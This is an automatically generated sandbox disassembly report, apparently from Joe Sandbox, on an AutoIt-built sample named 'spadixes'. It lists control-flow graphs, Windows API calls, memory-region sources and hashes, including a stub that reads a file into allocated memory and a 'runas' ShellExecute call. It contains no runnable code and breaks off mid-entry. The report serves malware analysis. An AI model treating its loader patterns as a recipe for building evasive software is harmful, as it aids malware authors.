                                                                                                                                                        control_flow_graph 471 8ce8b0-8ce914 475 8ce91a 471->475 476 8cebc7-8cebec 471->476 478 8ce920-8ce92c 475->478 478->476 479 8ce932-8ce946 478->479 481 8ce94c-8ce95d PeekMessageW 479->481 482 93518f-935196 479->482 483 8cecf0-8cecf5 481->483 484 8ce963-8ce96a 481->484 485 8ce982-8ce9a3 482->485 486 93519c 482->486 490 9351a1-9351a8 483->490 491 8cecfb-8ced0c call 8de244 483->491 488 9351b7-9351c5 484->488 489 8ce970-8ce977 484->489 497 8cea04-8cea0b 485->497 498 8ce9a5-8ce9ac 485->498 486->490 499 93527b-935281 488->499 493 8ce97d 489->493 494 9359d0-9359ea call 8c32e8 489->494 490->488 501 8ced0e-8ced1f call 8ddc5f 491->501 502 8ced21-8ced32 PeekMessageW 491->502 493->485 494->476 506 8ceab7-8ceac0 call 8ceed0 497->506 507 8cea11-8cea18 497->507 498->497 503 8ce9ae-8ce9cd 498->503 504 935287 499->504 505 8cec1b-8cec1f 499->505 501->502 524 8ced3a-8ced50 TranslateMessage DispatchMessageW 501->524 502->484 511 8ced38 502->511 510 8ce9d0-8ce9d2 503->510 519 93528c-935298 call 90d051 504->519 512 8cec30-8cec33 505->512 513 8cec21 505->513 529 8cebb4-8cebc1 506->529 530 8ceac6-8cebac call 8cef00 506->530 507->506 515 8cea1e-8cea25 507->515 517 8cebef-8cebf5 510->517 518 8ce9d8-8ce9dc 510->518 511->483 512->510 520 8cedae-8cede3 timeGetTime call 8c1caa call 8c2aae 513->520 521 8cec27-8cec2a 513->521 515->506 523 8cea2b-8cea69 call 8df4ea * 2 515->523 517->512 525 8cebf7-8cec0c timeGetTime 517->525 526 8ce9e0 518->526 519->526 520->510 521->512 521->520 550 8cea6f-8cea79 523->550 551 8cedfb 523->551 524->502 525->499 532 8cec12-8cec18 525->532 533 8ce9e2-8ce9e8 526->533 529->476 529->478 530->529 532->505 540 8cec1a 532->540 541 8ce9ee-8ce9fb 533->541 542 8cec38-8cec3e 533->542 540->505 541->529 546 8cea01 541->546 542->519 548 8cec44-8cec47 542->548 546->497 548->533 553 8cea80-8cea87 550->553 551->482 555 8cea8d-8cea94 553->555 556 93529d-9352ba call 928d23 call 92e881 553->556 558 935420-935427 555->558 559 8cea9a-8ceaa0 555->559 573 9352c4-9352d3 556->573 574 9352bc-9352bf call 904a00 556->574 562 935445-935447 Sleep 558->562 563 935429-935430 558->563 559->506 564 8ceaa2-8ceab4 call 8df55e * 2 559->564 562->494 563->562 567 935432-93543a Sleep 563->567 564->506 567->562 573->553 578 9352d9-9352e9 call 8c1caa 573->578 574->573 578->553 585 9352ef-93541b call 8d2c20 call 8cce19 call 8cd6e9 call 8ccb37 call 8d2c20 call 8cce19 call 8cd6e9 call 8ccb37 call 8d2c20 call 8cce19 call 8cd6e9 call 8ccb37 call 8c2aae call 8d2c20 call 9049f8 578->585 585->529
                                                                                                                                                        APIs
                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008CE959
                                                                                                                                                        • timeGetTime.WINMM ref: 008CEBFA
                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008CED2E
                                                                                                                                                        • TranslateMessage.USER32(?), ref: 008CED3F
                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 008CED4A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Message$Peek$DispatchTimeTranslatetime
                                                                                                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                                                                        • API String ID: 3210251501-758534266
                                                                                                                                                        • Opcode ID: 54c7dff12753a94b62f12e97130040d06c55d64a0934e5ae6a10513d915e4bfc
                                                                                                                                                        • Instruction ID: 4f5da2e5c930598bdd15fb3fd12569995337aae71edf77eb52611ef396ac5d4f
                                                                                                                                                        • Opcode Fuzzy Hash: 54c7dff12753a94b62f12e97130040d06c55d64a0934e5ae6a10513d915e4bfc
                                                                                                                                                        • Instruction Fuzzy Hash: 79F1AF705183809FEB24DF64C885FAA77E8FB55304F18096DE986CB292D7B4D889CB52

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 008C3F86
                                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 008C3FB0
                                                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008C3FC1
                                                                                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 008C3FDE
                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008C3FEE
                                                                                                                                                        • LoadIconW.USER32(000000A9), ref: 008C4004
                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008C4013
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                        • API String ID: 2914291525-1005189915
                                                                                                                                                        • Opcode ID: 5f9e1ef8fd216a64e6853421f9391e2229b80c0a8fe9650e698b6eda024b31b3
                                                                                                                                                        • Instruction ID: 1a7ea323a10b07a66e7dab7f5d95b836ad9a3f92deb1a3b0efe7dac38d513a6a
                                                                                                                                                        • Opcode Fuzzy Hash: 5f9e1ef8fd216a64e6853421f9391e2229b80c0a8fe9650e698b6eda024b31b3
                                                                                                                                                        • Instruction Fuzzy Hash: F821F7B9D25318AFDB00DFA4EC89BCDBBB8FB09700F00421AF611A63A0D7B50545AF90

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0090BDB4: __time64.LIBCMT ref: 0090BDBE
                                                                                                                                                          • Part of subcall function 008C4517: _fseek.LIBCMT ref: 008C452F
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 0090C083
                                                                                                                                                        • _wcscpy.LIBCMT ref: 0090C096
                                                                                                                                                        • _wcscat.LIBCMT ref: 0090C0A9
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 0090C0CE
                                                                                                                                                        • _wcscat.LIBCMT ref: 0090C0E4
                                                                                                                                                        • _wcscat.LIBCMT ref: 0090C0F7
                                                                                                                                                        • _wcscmp.LIBCMT ref: 0090C03E
                                                                                                                                                          • Part of subcall function 0090C56D: _wcscmp.LIBCMT ref: 0090C65D
                                                                                                                                                          • Part of subcall function 0090C56D: _wcscmp.LIBCMT ref: 0090C670
                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0090C2A1
                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0090C338
                                                                                                                                                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0090C34E
                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0090C35F
                                                                                                                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0090C371
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64_fseek_wcscpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3728024260-0
                                                                                                                                                        • Opcode ID: e17e2586fb510ba94bbf94a18978d21180dfc0c677eac37f5072ae97bcd6c232
                                                                                                                                                        • Instruction ID: 294f937189edfae4b9bf51c25c778f01183e24cab08a802892c5d1a7903b460b
                                                                                                                                                        • Opcode Fuzzy Hash: e17e2586fb510ba94bbf94a18978d21180dfc0c677eac37f5072ae97bcd6c232
                                                                                                                                                        • Instruction Fuzzy Hash: 30C12CB1900219AFDF15DF99CC81EDEB7BDEF49300F1081AAF609E6151DB709A848F65

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 717 8c3742-8c3762 719 8c3764-8c3767 717->719 720 8c37c2-8c37c4 717->720 722 8c37c8 719->722 723 8c3769-8c3770 719->723 720->719 721 8c37c6 720->721 726 8c37ab-8c37b3 DefWindowProcW 721->726 727 8c37ce-8c37d1 722->727 728 931e00-931e2e call 8c2ff6 call 8de312 722->728 724 8c382c-8c3834 PostQuitMessage 723->724 725 8c3776-8c377b 723->725 732 8c37f2-8c37f4 724->732 730 931e88-931e9c call 904ddd 725->730 731 8c3781-8c3783 725->731 733 8c37b9-8c37bf 726->733 734 8c37f6-8c381d SetTimer RegisterWindowMessageW 727->734 735 8c37d3-8c37d4 727->735 761 931e33-931e3a 728->761 730->732 754 931ea2 730->754 737 8c3789-8c378e 731->737 738 8c3836-8c3840 call 8deb83 731->738 732->733 734->732 739 8c381f-8c382a CreatePopupMenu 734->739 741 931da3-931da6 735->741 742 8c37da-8c37ed KillTimer call 8c3847 call 8c390f 735->742 744 8c3794-8c3799 737->744 745 931e6d-931e74 737->745 755 8c3845 738->755 739->732 748 931da8-931daa 741->748 749 931ddc-931dfb MoveWindow 741->749 742->732 752 8c379f-8c37a5 744->752 753 931e58-931e68 call 9055bd 744->753 745->726 759 931e7a-931e83 call 8fa5f3 745->759 756 931dcb-931dd7 SetFocus 748->756 757 931dac-931daf 748->757 749->732 752->726 752->761 753->732 754->726 755->732 756->732 757->752 762 931db5-931dc6 call 8c2ff6 757->762 759->726 761->726 766 931e40-931e53 call 8c3847 call 8c4ffc 761->766 762->732 766->726
                                                                                                                                                        APIs
                                                                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 008C37B3
                                                                                                                                                        • KillTimer.USER32(?,00000001), ref: 008C37DD
                                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008C3800
                                                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008C380B
                                                                                                                                                        • CreatePopupMenu.USER32 ref: 008C381F
                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 008C382E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                        • String ID: TaskbarCreated
                                                                                                                                                        • API String ID: 129472671-2362178303
                                                                                                                                                        • Opcode ID: bde94c07dd96bd345864dfbb29788abb48d8d6eedeb18153820a0b51298ede3d
                                                                                                                                                        • Instruction ID: 7a7a8955fea781722dc773c834f0973025fc9a40e5264f5461e07f537ca163b8
                                                                                                                                                        • Opcode Fuzzy Hash: bde94c07dd96bd345864dfbb29788abb48d8d6eedeb18153820a0b51298ede3d
                                                                                                                                                        • Instruction Fuzzy Hash: 8D41F7F511824D6BDB246F689C49F7936B9F705305F00813DF902D62A1CA70DD43A762

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 008C3E79
                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 008C3E88
                                                                                                                                                        • LoadIconW.USER32(00000063), ref: 008C3E9E
                                                                                                                                                        • LoadIconW.USER32(000000A4), ref: 008C3EB0
                                                                                                                                                        • LoadIconW.USER32(000000A2), ref: 008C3EC2
                                                                                                                                                          • Part of subcall function 008C4024: LoadImageW.USER32(008C0000,00000063,00000001,00000010,00000010,00000000), ref: 008C4048
                                                                                                                                                        • RegisterClassExW.USER32(?), ref: 008C3F30
                                                                                                                                                          • Part of subcall function 008C3F53: GetSysColorBrush.USER32(0000000F), ref: 008C3F86
                                                                                                                                                          • Part of subcall function 008C3F53: RegisterClassExW.USER32(00000030), ref: 008C3FB0
                                                                                                                                                          • Part of subcall function 008C3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008C3FC1
                                                                                                                                                          • Part of subcall function 008C3F53: InitCommonControlsEx.COMCTL32(?), ref: 008C3FDE
                                                                                                                                                          • Part of subcall function 008C3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008C3FEE
                                                                                                                                                          • Part of subcall function 008C3F53: LoadIconW.USER32(000000A9), ref: 008C4004
                                                                                                                                                          • Part of subcall function 008C3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008C4013
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                        • String ID: #$0$AutoIt v3
                                                                                                                                                        • API String ID: 423443420-4155596026
                                                                                                                                                        • Opcode ID: e440d4bdd5be9d5a15e1b6fb4aa3e691da4956ea8c89a654aeb202e568598c5b
                                                                                                                                                        • Instruction ID: 1bb2aa12f2367ae7e2d37af74ab0bb91376df47a4300b254413caf2532bff668
                                                                                                                                                        • Opcode Fuzzy Hash: e440d4bdd5be9d5a15e1b6fb4aa3e691da4956ea8c89a654aeb202e568598c5b
                                                                                                                                                        • Instruction Fuzzy Hash: 402162B4D18304ABCB14DFA9EC49B9DBFF9FB48710F00812AE604A33A0D7754645AF91

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 781 15d25c8-15d2676 call 15cffa8 784 15d267d-15d26a3 call 15d34d8 CreateFileW 781->784 787 15d26aa-15d26ba 784->787 788 15d26a5 784->788 796 15d26bc 787->796 797 15d26c1-15d26db VirtualAlloc 787->797 789 15d27f5-15d27f9 788->789 790 15d283b-15d283e 789->790 791 15d27fb-15d27ff 789->791 793 15d2841-15d2848 790->793 794 15d280b-15d280f 791->794 795 15d2801-15d2804 791->795 800 15d289d-15d28b2 793->800 801 15d284a-15d2855 793->801 802 15d281f-15d2823 794->802 803 15d2811-15d281b 794->803 795->794 796->789 798 15d26dd 797->798 799 15d26e2-15d26f9 ReadFile 797->799 798->789 804 15d26fb 799->804 805 15d2700-15d2740 VirtualAlloc 799->805 808 15d28b4-15d28bf VirtualFree 800->808 809 15d28c2-15d28ca 800->809 806 15d2859-15d2865 801->806 807 15d2857 801->807 810 15d2825-15d282f 802->810 811 15d2833 802->811 803->802 804->789 812 15d2747-15d2762 call 15d3728 805->812 813 15d2742 805->813 814 15d2879-15d2885 806->814 815 15d2867-15d2877 806->815 807->800 808->809 810->811 811->790 821 15d276d-15d2777 812->821 813->789 818 15d2887-15d2890 814->818 819 15d2892-15d2898 814->819 817 15d289b 815->817 817->793 818->817 819->817 822 15d2779-15d27a8 call 15d3728 821->822 823 15d27aa-15d27be call 15d3538 821->823 822->821 828 15d27c0 823->828 829 15d27c2-15d27c6 823->829 828->789 831 15d27c8-15d27cc CloseHandle 829->831 832 15d27d2-15d27d6 829->832 831->832 833 15d27d8-15d27e3 VirtualFree 832->833 834 15d27e6-15d27ef 832->834 833->834 834->784 834->789
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 015D2699
                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 015D28BF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1284950359.00000000015CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 015CF000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_15cf000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFileFreeVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 204039940-0
                                                                                                                                                        • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                                                                                                        • Instruction ID: 36244b35f9bd9de2c0a80dce6c71357bf84084add61beb027c1e11ba46b4a624
                                                                                                                                                        • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                                                                                                        • Instruction Fuzzy Hash: BDA12B74E04209EBDB24CFA8C899BEEBBB5FF48304F208559E601BB280D7759A41CF54

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 835 8dddc0-8dde4f call 8cd7f7 GetVersionExW call 8c6a63 call 8ddfb4 call 8c6571 844 8dde55-8dde56 835->844 845 9324c8-9324cb 835->845 846 8dde58-8dde63 844->846 847 8dde92-8ddea2 call 8ddf77 844->847 848 9324e4-9324e8 845->848 849 9324cd 845->849 852 8dde69-8dde6b 846->852 853 93244e-932454 846->853 866 8ddea4-8ddec1 GetCurrentProcess call 8ddf5f 847->866 867 8ddec7-8ddee1 847->867 850 9324d3-9324dc 848->850 851 9324ea-9324f3 848->851 855 9324d0 849->855 850->848 851->855 858 9324f5-9324f8 851->858 859 932469-932475 852->859 860 8dde71-8dde74 852->860 856 932456-932459 853->856 857 93245e-932464 853->857 855->850 856->847 857->847 858->850 862 932477-93247a 859->862 863 93247f-932485 859->863 864 932495-932498 860->864 865 8dde7a-8dde89 860->865 862->847 863->847 864->847 870 93249e-9324b3 864->870 871 8dde8f 865->871 872 93248a-932490 865->872 866->867 886 8ddec3 866->886 868 8ddf31-8ddf3b GetSystemInfo 867->868 869 8ddee3-8ddef7 call 8de00c 867->869 874 8ddf0e-8ddf1a 868->874 883 8ddf29-8ddf2f GetSystemInfo 869->883 884 8ddef9-8ddf01 call 8ddff4 GetNativeSystemInfo 869->884 876 9324b5-9324b8 870->876 877 9324bd-9324c3 870->877 871->847 872->847 880 8ddf1c-8ddf1f FreeLibrary 874->880 881 8ddf21-8ddf26 874->881 876->847 877->847 880->881 885 8ddf03-8ddf07 883->885 884->885 885->874 889 8ddf09-8ddf0c FreeLibrary 885->889 886->867 889->874
                                                                                                                                                        APIs
                                                                                                                                                        • GetVersionExW.KERNEL32(?,00000000), ref: 008DDDEC
                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,0095DC38,?,?), ref: 008DDEAC
                                                                                                                                                        • GetNativeSystemInfo.KERNELBASE(?,0095DC38,?,?), ref: 008DDF01
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 008DDF0C
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 008DDF1F
                                                                                                                                                        • GetSystemInfo.KERNEL32(?,0095DC38,?,?), ref: 008DDF29
                                                                                                                                                        • GetSystemInfo.KERNEL32(?,0095DC38,?,?), ref: 008DDF35
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3851250370-0
                                                                                                                                                        • Opcode ID: 7112ad6e11a0914cdf631f2b528ec964110ec87a44e267f299b0636594fdc38e
                                                                                                                                                        • Instruction ID: 2b530d6d4b6b8889aad72feff0fa7b2e11e276931a75e2b4c5a48c1abefeb215
                                                                                                                                                        • Opcode Fuzzy Hash: 7112ad6e11a0914cdf631f2b528ec964110ec87a44e267f299b0636594fdc38e
                                                                                                                                                        • Instruction Fuzzy Hash: DF61B1B180A384CBCF15CFA898C15E97FB4BF2A304F194AD9D8459F307C624C909CB66

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 008C3DC8
                                                                                                                                                          • Part of subcall function 008C6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008C3DEE,00981148,?), ref: 008C6471
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 008C3E48
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,00981148,?), ref: 00931D06
                                                                                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,?,?,0095DAB4,00981148,?), ref: 00931D89
                                                                                                                                                        • ShellExecuteW.SHELL32(00000000,?,?,0095DAB4,00981148,?), ref: 00931D90
                                                                                                                                                          • Part of subcall function 008C3E6E: GetSysColorBrush.USER32(0000000F), ref: 008C3E79
                                                                                                                                                          • Part of subcall function 008C3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 008C3E88
                                                                                                                                                          • Part of subcall function 008C3E6E: LoadIconW.USER32(00000063), ref: 008C3E9E
                                                                                                                                                          • Part of subcall function 008C3E6E: LoadIconW.USER32(000000A4), ref: 008C3EB0
                                                                                                                                                          • Part of subcall function 008C3E6E: LoadIconW.USER32(000000A2), ref: 008C3EC2
                                                                                                                                                          • Part of subcall function 008C3E6E: RegisterClassExW.USER32(?), ref: 008C3F30
                                                                                                                                                          • Part of subcall function 008C36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 008C36E6
                                                                                                                                                          • Part of subcall function 008C36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008C3707
                                                                                                                                                          • Part of subcall function 008C36B8: ShowWindow.USER32(00000000), ref: 008C371B
                                                                                                                                                          • Part of subcall function 008C36B8: ShowWindow.USER32(00000000), ref: 008C3724
                                                                                                                                                          • Part of subcall function 008C4FFC: _memset.LIBCMT ref: 008C5022
                                                                                                                                                          • Part of subcall function 008C4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008C50CB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$IconLoad$CreateCurrentDirectoryFullNamePathShow$BrushClassColorCursorExecuteForegroundNotifyRegisterShellShell__memset
                                                                                                                                                        • String ID: runas
                                                                                                                                                        • API String ID: 4126474716-4000483414
                                                                                                                                                        • Opcode ID: 8b359dd0f718c7d9cafdf246dcb673a7a48fafdf50251d5a8320dbf10ee21ca7
                                                                                                                                                        • Instruction ID: 814031b9b96593c6439f22213392567ed7c3a1b66a3ae80bc3cf986dfff46f6d
                                                                                                                                                        • Opcode Fuzzy Hash: 8b359dd0f718c7d9cafdf246dcb673a7a48fafdf50251d5a8320dbf10ee21ca7
                                                                                                                                                        • Instruction Fuzzy Hash: 7231B331D0C248AACF11BBF4DC49FED7B79FB56704F04806DE501E22A2DA349646DB22

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 008C4A1D
                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009341DB
                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0093421A
                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00934249
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
